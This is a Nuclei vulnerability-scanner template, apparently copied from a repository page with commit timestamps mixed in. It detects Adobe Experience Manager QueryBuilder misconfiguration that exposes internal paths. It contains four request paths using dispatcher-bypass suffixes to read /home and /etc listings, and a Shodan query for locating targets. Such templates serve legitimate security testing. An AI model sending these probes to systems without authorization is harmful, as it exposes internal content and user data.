nuclei-templates/http/misconfiguration/aem/aem-querybuilder-internal-p...

36 lines
1.2 KiB
YAML
Raw Normal View History

id: aem-querybuilder-internal-path-read
info:
name: AEM QueryBuilder Internal Path Read
author: DhiyaneshDk
severity: medium
2024-01-03 06:08:41 +00:00
description: AEM QueryBuilder is vulnerable to LFI.
reference:
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
metadata:
max-request: 4
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,misconfig
http:
- method: GET
path:
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
2021-04-05 18:25:18 +00:00
stop-at-first-match: true
2023-10-14 11:27:55 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-04-05 18:25:18 +00:00
- type: word
words:
2021-04-05 18:25:18 +00:00
- 'jcr:path'
2021-04-13 19:54:00 +00:00
- 'success'
2023-10-14 11:27:55 +00:00
condition: and
# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950